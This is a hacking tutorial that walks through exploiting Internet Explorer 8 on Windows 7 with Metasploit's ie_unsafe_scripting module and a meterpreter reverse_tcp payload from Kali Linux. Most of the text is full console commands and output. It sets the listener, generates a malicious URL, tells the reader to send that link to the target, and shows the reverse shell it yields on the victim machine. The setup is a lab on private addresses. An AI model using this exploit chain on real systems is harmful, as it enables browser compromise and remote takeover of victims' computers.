Hack Internet Explorer 8 in Windows 7 using Kali Linux

In this tutorial, we will hack Internet Explorer 8 in Windows 7 Service Pack 1 (unpatched) using Metasploit in Kali Linux and get a remote shell on the Windows 7 machine.

This exploit works when the Initialize and script ActiveX controls not marked as safe setting is enabled in Internet Explorer.

To enable the above setting, start Internet Explorer and click on Tools -> Internet Options -> Security -> Custom Level -> Initialize and script ActiveX controls not marked as safe -> Enable.

We have the  following configuration:
Windows 7 IP Address: 192.168.122.10
Kali Linux IP Address: 192.168.122.115

Perform the following steps on the Kali Linux Machine

1) Start the services.
root@kali:~# service postgresql start
[ ok ] Starting PostgreSQL 9.1 database server: main.

root@kali:~# service metasploit start
[ ok ] Starting Metasploit rpc server: prosvc.[ ok ] Starting Metasploit web server: thin.
[ ok ] Starting Metasploit worker: worker.


2) Start metasploit console.
root@kali:~# msfconsole
msf >

3) Select exploit.
msf > use exploit/windows/browser/ie_unsafe_scripting

4) Select payload. 
msf exploit(ie_unsafe_scripting) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp

5) View options.
msf exploit(ie_unsafe_scripting) > show options

Module options (exploit/windows/browser/ie_unsafe_scripting):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   SRVHOST    0.0.0.0          yes       The local host to listen on. This must be an address on the local machine or 0.0.0.0
   SRVPORT    8080             yes       The local port to listen on.
   SSL        false            no        Negotiate SSL for incoming connections
   SSLCert                     no        Path to a custom SSL certificate (default is randomly generated)
   TECHNIQUE  VBS              yes       Delivery technique (VBS Exe Drop or PSH CMD) (accepted: VBS, Powershell)
   URIPATH                     no        The URI to use for this exploit (default is random)


Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique (accepted: seh, thread, process, none)
   LHOST                      yes       The listen address
   LPORT     4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Windows x86/x64

6) Set options
msf exploit(ie_unsafe_scripting) > set LHOST 192.168.122.115
LHOST => 192.168.122.115

7) Execute the exploit.
msf exploit(ie_unsafe_scripting) > exploit
[*] Exploit running as background job.

[*] Started reverse handler on 192.168.122.115:4444
msf exploit(ie_unsafe_scripting) > [*] Using URL: http://0.0.0.0:8080/bHN7e4
[*]  Local IP: http://192.168.122.115:8080/bHN7e4
[*] Server started.


8) User clicks on the malicious URL. As we can see, a link has been generated as a result of the exploit command. This is the malicious link (http://192.168.122.115:8080/bHN7e4) that we will have to send to our target, so that it can exploit their browser.

When the user clicks on the malicious link, the browser will try to load the page, but nothing will be displayed. But you will get a remote shell on your msfconsole, as shown below.

msf exploit(ie_unsafe_scripting) > [*] 192.168.122.10   ie_unsafe_scripting - Request received for /bHN7e4
[*] 192.168.122.10   ie_unsafe_scripting - Sending exploit html/javascript
[*] Sending stage (770048 bytes) to 192.168.122.10
[*] Meterpreter session 1 opened (192.168.122.115:4444 -> 192.168.122.10:49166) at 2015-06-20 17:13:43 +0530

msf exploit(ie_unsafe_scripting) > sessions -i 1
[*] Starting interaction with 1...

meterpreter > shell
Process 3680 created.
Channel 1 created.
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation.  All rights reserved.

C:\Users\shabbir\Desktop>